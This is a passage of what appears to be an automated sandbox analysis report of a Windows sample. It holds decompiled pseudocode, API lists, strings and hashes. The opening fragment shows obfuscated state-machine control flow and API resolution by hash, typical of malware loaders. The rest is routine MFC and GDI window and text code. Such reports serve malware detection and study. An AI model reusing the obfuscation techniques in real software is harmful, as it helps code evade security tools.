									_t99 =  &_v1056;
									_t40 = E022CB3A0(_t99,  &_v1064);
									asm("sbb eax, eax");
									_t39 = ( ~_t40 & 0x28f9ad68) + 0xa70e03e;
									_t155 = _v1064;
									goto L3;
								} else {
									__eflags = _t39 - 0x336a8da6;
									if(_t39 != 0x336a8da6) {
										goto L45;
									} else {
										_t99 = _t155;
										_t43 = E022C1140(_v1060);
										_t134 = _v1080;
										_t97 = _t43;
										__eflags = _t97;
										_v1068 = _t97;
										_t39 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
										goto L3;
									}
								}
							} else {
								if(__eflags == 0) {
									_t99 = _t147;
									_t46 = E022CAB50(_t99, _t134,  &_v524);
									_t134 = _v1080;
									_t157 = _t157 + 4;
									asm("sbb eax, eax");
									_t39 = ( ~_t46 & 0xf935bf44) + 0x1f9eb481;
									goto L3;
								} else {
									__eflags = _t39 - 0x1dedf83c;
									if(_t39 == 0x1dedf83c) {
										_t49 =  *0x22cdea8;
										__eflags = _t49;
										if(_t49 == 0) {
											_t99 = E022C3F20(0xbb398380);
											_t49 = E022C3E80(_t97, _t99, 0x97f883e, _t155);
											 *0x22cdea8 = _t49;
										}
										_t153 =  *_t49();
										_t51 =  *0x22ce1a0;
										__eflags = _t51;
										if(_t51 == 0) {
											_t99 = E022C3F20(0xbb398380);
											_t51 = E022C3E80(_t97, _t99, 0x26c3f343, _t155);
											 *0x22ce1a0 = _t51;
										}
										 *_t51(_t153, 0, _t155);
										_t147 = _v1088;
										_t39 = 0xa70e03e;
										_t134 = _v1092;
										goto L3;
									} else {
										__eflags = _t39 - 0x1f9eb481;
										if(_t39 == 0x1f9eb481) {
											return E022C4250(_t97, _v1072);
										}
										goto L45;
									}
								}
							}
							goto L60;
							L45:
							__eflags = _t39 - 0x1c40b504;
						} while (_t39 != 0x1c40b504);
						return _t39;
						goto L60;
					}
				}
			}

0x022c9fa0
0x022c9fa0
0x022c9fab
0x022c9fb0
0x022c9fb4
0x022c9fb9
0x022c9fb9
0x022c9fb9
0x022c9fc2
0x022c9fc2
0x022c9fd0
0x022c9fd0
0x022c9fd0
0x022c9fd0
0x022c9fd5
0x00000000
0x00000000
0x022c9fdb
0x022ca25f
0x022ca264
0x022ca266
0x022ca277
0x022ca279
0x022ca27e
0x022ca27e
0x022ca285
0x022ca287
0x022ca28c
0x022ca28e
0x022ca29f
0x022ca2a1
0x022ca2a6
0x022ca2a6
0x022ca2af
0x022ca2b1
0x022ca2b5
0x00000000
0x022c9fe1
0x022c9fe1
0x022c9fe6
0x022ca17a
0x022ca17f
0x022ca1ee
0x022ca1f3
0x022ca1f5
0x022ca206
0x022ca208
0x022ca20d
0x022ca20d
0x022ca214
0x022ca216
0x022ca21b
0x022ca21d
0x022ca22e
0x022ca230
0x022ca235
0x022ca235
0x022ca23f
0x022ca241
0x022ca245
0x022ca247
0x022ca416
0x022ca24d
0x022ca24d
0x022ca251
0x00000000
0x022ca256
0x022ca181
0x022ca181
0x022ca186
0x00000000
0x022ca18c
0x022ca196
0x022ca198
0x022ca19d
0x022ca19f
0x022ca1b2
0x022ca1b7
0x022ca1b7
0x022ca1d0
0x022ca1d2
0x022ca1d5
0x022ca1d7
0x022ca1dc
0x022ca1e0
0x00000000
0x022ca1e5
0x022ca186
0x022c9fec
0x022c9fec
0x022ca3e3
0x022ca3e7
0x022ca3ea
0x022ca3ef
0x022ca3f2
0x022ca402
0x022c9ff2
0x022c9ff7
0x022ca142
0x022ca147
0x022ca149
0x022ca15a
0x022ca15c
0x022ca161
0x022ca161
0x022ca16a
0x022ca170
0x00000000
0x022c9ffd
0x022ca002
0x022ca121
0x022ca123
0x022ca12a
0x022ca12c
0x022ca135
0x022ca138
0x00000000
0x022ca008
0x022ca00d
0x00000000
0x022ca013
0x022ca013
0x022ca019
0x022ca01e
0x022ca024
0x022ca02a
0x022ca03b
0x022ca03d
0x022ca042
0x022ca042
0x022ca048
0x022ca04a
0x022ca057
0x022ca05d
0x022ca06e
0x022ca075
0x022ca077
0x022ca077
0x022ca07d
0x022ca081
0x022ca092
0x022ca099
0x022ca09b
0x022ca09b
0x022ca0a1
0x022ca0a5
0x022ca0b6
0x022ca0bf
0x022ca0bf
0x022ca0c5
0x022ca0cd
0x022ca0de
0x022ca0e5
0x022ca0e7
0x022ca0e7
0x022ca104
0x022ca106
0x022ca10c
0x022ca110
0x022ca117
0x00000000
0x022ca117
0x022ca00d
0x022ca002
0x022c9ff7
0x022c9fec
0x022c9fe6
0x00000000
0x022c9fdb
0x022ca2c3
0x022ca2c8
0x022ca389
0x022ca38e
0x022ca3c3
0x022ca3c7
0x022ca3d2
0x022ca3d9
0x022c9fc2
0x00000000
0x022ca390
0x022ca390
0x022ca395
0x00000000
0x022ca39b
0x022ca39f
0x022ca3a1
0x022ca3a6
0x022ca3aa
0x022ca3ac
0x022ca3ae
0x022ca3b7
0x00000000
0x022ca3b7
0x022ca395
0x022ca2ce
0x022ca2ce
0x022ca367
0x022ca36a
0x022ca36f
0x022ca373
0x022ca378
0x022ca37f
0x00000000
0x022ca2d4
0x022ca2d4
0x022ca2d9
0x022ca2fc
0x022ca301
0x022ca303
0x022ca314
0x022ca316
0x022ca31b
0x022ca31b
0x022ca322
0x022ca324
0x022ca329
0x022ca32b
0x022ca33c
0x022ca33e
0x022ca343
0x022ca343
0x022ca34c
0x022ca34e
0x022ca352
0x022ca357
0x00000000
0x022ca2db
0x022ca2db
0x022ca2e0
0x00000000
0x022ca407
0x00000000
0x022ca2e0
0x022ca2d9
0x022ca2ce
0x00000000
0x022ca2e6
0x022ca2e6
0x022ca2e6
0x022ca2fb
0x00000000
0x022ca2fb
0x022c9fc2

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 022CA0FB
GetCurrentProcess.KERNEL32(00000000), ref: 022CA0FE
GetCurrentProcess.KERNEL32(00000000), ref: 022CA101

Strings

Ei, xrefs: 022CA1A1
>p, xrefs: 022CA352
>p, xrefs: 022C9FF2
79V#, xrefs: 022CA069
79V#, xrefs: 022CA08D
79V#, xrefs: 022CA0B1

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p$>p$Ei
API String ID: 2050909247-1771473519
Opcode ID: e8f42db3f73af6018ca330ab2e01c8be26b13918da136968a25db743b99986eb
Instruction ID: 7bdf3cc916a6029df7ca15fe0749add615afc8783a90629ec5ad34271479e210
Opcode Fuzzy Hash: e8f42db3f73af6018ca330ab2e01c8be26b13918da136968a25db743b99986eb
Instruction Fuzzy Hash: B3A1F0B1B603069BC710EEE8A49466E32E6ABC4244F744E6DF445DB348EEB5DC018BD2

Uniqueness

Uniqueness Score: -1.00%

Function 0041D196, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041D196(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				signed int _v24;
				intOrPtr _v28;
				struct tagRECT _v44;
				char _v304;
				void* __ebp;
				int _t69;
				signed char _t72;
				signed char _t77;
				signed int _t82;
				signed int _t84;
				void* _t90;
				struct HWND__* _t94;
				intOrPtr _t122;
				intOrPtr _t130;
				void* _t142;
				signed char _t143;
				signed char _t145;
				intOrPtr _t147;
				void* _t149;

				_t142 = __edx;
				_t147 = _a4;
				_t122 = __ecx;
				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
					_t143 = 0;
					__eflags = 0;
					L5:
					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
					}
					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
					 *(_t122 + 0x64) = _t72;
					if((_t72 & 0x00000040) == 0) {
						E004165E5(_t147,  &_v304, 0x104);
						E0041A843( *(_t122 + 0x1c),  &_v304);
					}
					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
						_t78 = _t77 & 0x000000fe;
						__eflags = _t77 & 0x000000fe;
					} else {
						_t78 = _t77 | 0x00000001;
					}
					E004263C3(_t147, _t78);
					_v28 = _t143;
					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
						E0041663D(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
						_v28 = 1;
					}
					_v24 = _v24 | 0xffffffff;
					if(_a8 == _t143) {
						_t144 = _t122 + 0x7c;
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
						_t82 =  *0x439bf4; // 0x2
						_t145 = 0;
						__eflags = 0;
						_t84 =  *0x439bf0; // 0x2
						E0041663D(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t122,  &_v20);
						asm("cdq");
						_t40 =  &(_v20.bottom); // 0x50402834
						asm("cdq");
						_push(( *_t40 - _v20.top - _t142 >> 1) + _v20.top);
						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
						asm("movsd");
						asm("movsd");
						_push(_a4);
						asm("movsd");
						asm("movsd");
						_v24 = E0041DD44(_t122);
						_t46 =  &(_v20.bottom); // 0x50402834
						E0041663D(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left,  *_t46 - _v20.top, 0x114);
						_t147 = _a4;
						_t145 = 0;
					}
					if(E00413740(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
						if(_t122 != _t145) {
							_t94 =  *(_t122 + 0x1c);
						} else {
							_t94 = 0;
						}
						E00413740(_t149, SetParent( *(_t147 + 0x1c), _t94));
					}
					_t130 =  *((intOrPtr*)(_t147 + 0x70));
					_t165 = _t130 - _t122;
					if(_t130 != _t122) {
						__eflags = _t130 - _t145;
						if(_t130 == _t145) {
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
							L30:
							__eflags = 0;
							L31:
							_push(0);
							_push(0xffffffff);
							goto L32;
						}
						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
						if(__eflags != 0) {
							goto L30;
						}
						_push(1);
						_pop(0);
						goto L31;
					} else {
						_push(_t145);
						_push(_v24);
						L32:
						_push(_t147);
						E0041D609(_t130, _t165);
						L33:
						_t166 = _v28 - _t145;
						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
						if(_v28 != _t145) {
							E0041663D(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
						}
						E0041D5A8(_t122, _t147);
						_t90 = E004225AA(_t122, _t166);
						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
						return _t90;
					}
				}
				_t143 = 0;
				if(_a8 != 0) {
					_t69 = EqualRect( &_v44, _a8);
					if(_t69 == 0) {
						goto L5;
					}
				}
				return _t69;
			}

APIs

GetWindowRect.USER32 ref: 0041D1AE
EqualRect.USER32 ref: 0041D1CB

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

IsWindowVisible.USER32(?), ref: 0041D254
CopyRect.USER32 ref: 0041D286
GetParent.USER32(?), ref: 0041D338
SetParent.USER32(?,0000E800), ref: 0041D357

Strings

4(@P, xrefs: 0041D2A5, 0041D2D0
@, xrefs: 0041D1E8
@m7@, xrefs: 0041D227, 0041D1F3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: 4(@P$@$@m7@
API String ID: 3103310903-421610842
Opcode ID: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction ID: 71934383aa5695cd313cdbbfccdfa0b0166ee7a8a5881c634a4d6990b46abeb0
Opcode Fuzzy Hash: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction Fuzzy Hash: 5461A5B1A00609EFDF21DF65CC85AEF7BB9EF44304F10452AF92696291C738D982CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00413821, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413821(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E00406520(E00429E08, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E00413740(_t75,  *(_t75 + 0x14));
					E004134A8(_t61, E00413740(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E00413509(E00413740(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
							} else {
								_t74 = E00413740(_t75, _t68);
								E0041340C(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E0041342F(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}

APIs

__EH_prolog.LIBCMT ref: 00413826
GetPropA.USER32 ref: 0041383E
CallWindowProcA.USER32 ref: 0041389C

Part of subcall function 0041342F: GetWindowRect.USER32 ref: 00413454
Part of subcall function 0041342F: GetWindow.USER32(?,00000004), ref: 00413471

SetWindowLongA.USER32 ref: 004138CC
RemovePropA.USER32 ref: 004138D4
GlobalFindAtomA.KERNEL32 ref: 004138DB
GlobalDeleteAtom.KERNEL32 ref: 004138E2

Part of subcall function 0041340C: GetWindowRect.USER32 ref: 00413418

CallWindowProcA.USER32 ref: 00413936

Strings

AfxOldWndProc423, xrefs: 00413834, 0041383C, 004138D2, 004138DA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction ID: 4899527f46ba9a8eebcd092d04d92ea77ba6043ae45329b01eeefbc2baec0ec1
Opcode Fuzzy Hash: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction Fuzzy Hash: F3316F7290011ABBCB12AFA5DD49EFF7FB8EF09712F00402AF501A2151C7799A519BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004251B9, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004251B9() {
				int _t1;
				int _t7;
				struct HDC__* _t12;
				void* _t18;

				_t1 =  *0x436880; // 0xffffffff
				if(_t1 == 0xffffffff) {
					_t12 = GetDC(0);
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_t18 = SelectObject(_t12, _t18);
					}
					GetCharWidthA(_t12, 0x36, 0x36, 0x436880);
					if(_t18 != 0) {
						SelectObject(_t12, _t18);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t12);
					_t7 =  *0x436880; // 0xffffffff
					return _t7;
				}
				return _t1;
			}

0x004251b9
0x004251c1
0x004251e8
0x004251fd
0x00425201
0x00425207
0x00425207
0x00425213
0x0042521b
0x0042521f
0x00425222
0x00425222
0x0042522a
0x00425230
0x00000000
0x00425238
0x00425239

APIs

GetDC.USER32(00000000), ref: 004251CA
GetSystemMetrics.USER32 ref: 004251EA
CreateFontA.GDI32(00000000,?,?,00425352,00001000,?,?), ref: 004251F1
SelectObject.GDI32(00000000,00000000), ref: 00425205
GetCharWidthA.GDI32(00000000,00000036,00000036,00436880), ref: 00425213
SelectObject.GDI32(00000000,00000000), ref: 0042521F
DeleteObject.GDI32(00000000), ref: 00425222
ReleaseDC.USER32 ref: 0042522A

Strings

Marlett, xrefs: 004251D0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction ID: 574e7069028db96244f8dd859ef817299f0475ae2c7f4c91e639d061ecb05676
Opcode Fuzzy Hash: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction Fuzzy Hash: A901A2317413507BC2312B266C8DE6B3F7CD7CBFA1B914225F515A2190CB654C01C6BC

Uniqueness

Uniqueness Score: -1.00%

Function 004037D0, Relevance: 15.4, APIs: 10, Instructions: 418
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				void* _t21;

				if(_a44 < 0 || _a44 >= 0x14) {
					_a44 = 0;
				}
				_t21 =  *((intOrPtr*)(0x4362b0 + _a44 * 4))(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
				return _t21;
			}

0x004037d7
0x004037df
0x004037df
0x00403811
0x0040381c

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction ID: c8df5cefcab56e12fb6afff3c38bb4f7a638dfcd913fb832871c6968f8fa9c0e
Opcode Fuzzy Hash: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction Fuzzy Hash: 4EF1E4B2A00108EBCB04CF99D995EEE77B9BF8C308F118259F919A7240D735EA15CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042914E, Relevance: 15.2, APIs: 10, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042914E(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v24;
				CHAR* _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				struct tagSIZE _v48;
				struct tagPOINT _v56;
				struct tagSIZE _v64;
				struct tagTEXTMETRICA _v120;
				struct tagTEXTMETRICA _v176;
				signed int _t119;
				signed int _t120;
				int _t121;
				signed int* _t125;
				long* _t127;
				signed int _t131;
				signed char _t132;
				int _t140;
				signed char* _t142;
				int _t144;
				int _t149;
				int _t153;
				signed int _t156;
				signed short _t159;
				signed char* _t167;
				int* _t170;
				signed int _t174;
				int _t175;
				int _t185;
				signed int _t187;
				int _t189;
				int _t190;
				void* _t191;
				int* _t193;

				_t191 = __ecx;
				GetTextMetricsA( *(__ecx + 8),  &_v120);
				GetTextMetricsA( *(__ecx + 4),  &_v176);
				GetTextExtentPoint32A( *(__ecx + 8), 0x42e890, 1,  &_v48);
				_t119 = GetTextAlign( *(__ecx + 8));
				_v40 = _t119;
				_t120 = _t119 & 0x00000001;
				_v36 = _t120;
				if(_t120 == 0) {
					_t170 = _a8;
				} else {
					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
					_t170 = _a8;
					 *_t170 = _v56.x;
				}
				_t121 =  *_t170;
				_t193 = _a40;
				_t167 = _a12;
				_t185 = 0;
				_v28 = _t167;
				_v32 = _t121;
				_a12 = _t121;
				_v12 = 0;
				_v20 = 0;
				if(_a20 != 0) {
					if(_a24 != 1) {
						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x42e88c, 1, 0, 0);
						_t170 = _a8;
						_t185 = 0;
						_v20 = _t159 & 0x0000ffff;
					} else {
						_v20 =  *_a28;
					}
				}
				_v8 = _t185;
				if( *_a16 <= _t185) {
					L31:
					_t187 = _v40 & 0x00000006;
					_v48.cx = _a12 -  *_t170;
					_t125 = _a44;
					 *_t125 =  *_t125 & 0x00000000;
					if(_t187 != 0) {
						if(_t187 != 6) {
							if(_t187 == 2) {
								 *_t125 = _v12;
							}
							L38:
							if(_v36 != 0) {
								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
							}
							 *_a16 = _t193 - _a40 >> 2;
							_t127 = _a4;
							 *_t127 = _v48.cx;
							_t127[1] = _v48.cy;
							return _t127;
						}
						asm("cdq");
						_t131 = _v12 - _t187 >> 1;
						L33:
						 *_t170 =  *_t170 + _t131;
						goto L38;
					}
					_t131 = _v12;
					goto L33;
				} else {
					while(1) {
						_t132 =  *_t167;
						_t174 = 0 | _t132 == _v120.tmBreakChar;
						_v24 = _t174;
						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
							_t140 = _v64.cx - _v120.tmOverhang + _v32;
							if(_v24 == 0) {
								_t140 = E0042911A(_t140, _a24, _a28, _a32, _v20);
							}
							_t175 = _t140;
							if(_t193 != _a40) {
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
							} else {
								_v12 = _v12 + _t175 - _a12;
							}
							_a12 = _t140;
							_v32 = _t140;
							_v28 =  &(_t167[1]);
						} else {
							_t144 = _t132 & 0x000000ff;
							if(( *(_t144 + 0x43b761) & 0x00000004) == 0) {
								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
									 *_t193 = _v120.tmAveCharWidth;
								}
								_t189 = _v16;
							} else {
								_t189 = _v176.tmAveCharWidth;
								 *_t193 = _v120.tmAveCharWidth;
							}
							_t190 = _t189 - _v176.tmOverhang;
							 *_t193 =  *_t193 - _v120.tmOverhang;
							_t149 =  *_t193;
							_a12 = _a12 + _t149;
							_v16 = _t190;
							if(_t193 != _a40) {
								asm("cdq");
								_t156 = _t149 - _t190 - _t190 >> 1;
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
								 *_t193 = _t149 - _t156;
							}
							_a36 = _a36 + 1;
							 *_a36 =  *_t167;
							if(( *(( *_t167 & 0x000000ff) + 0x43b761) & 0x00000004) != 0) {
								_a36 = _a36 + 1;
								 *_a36 = _t167[1];
								_t153 =  *_t193;
								_a12 = _a12 + _t153;
								_t193 =  &(_t193[1]);
								_v8 = _v8 + 1;
								 *_t193 = _t153;
							}
							_t193 =  &(_t193[1]);
						}
						_t142 = E00406AFA(_t167);
						_v8 = _v8 + 1;
						_t167 = _t142;
						if(_v8 >=  *_a16) {
							break;
						}
						_t185 = 0;
					}
					_t170 = _a8;
					goto L31;
				}
			}

APIs

GetTextMetricsA.GDI32(?,?), ref: 00429168
GetTextMetricsA.GDI32(?,?), ref: 00429174
GetTextExtentPoint32A.GDI32(?,0042E890,00000001,?), ref: 00429184
GetTextAlign.GDI32(?), ref: 0042918D
GetCurrentPositionEx.GDI32(?,?), ref: 004291A5
GetTabbedTextExtentA.USER32(?,0042E88C,00000001,00000000,00000000), ref: 004291F3
GetCharWidthA.GDI32(?,?,?,?), ref: 0042925A
GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 00429269
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004292E9
MoveToEx.GDI32(?,?,?,00000000), ref: 00429397

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
String ID:
API String ID: 2070200100-0
Opcode ID: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction ID: 5ee3fa6e800e5c42c7f25724716c3f9a342090dd9abbfd9a25ef7c0a74f7065c
Opcode Fuzzy Hash: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction Fuzzy Hash: EE914670A0021AEFCF15CFA8D884AEEBBB5FF48304F54856AE859A7250D334AD51CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042185A, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042185A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t53;
				int _t58;
				int _t61;
				signed int _t65;
				int _t66;
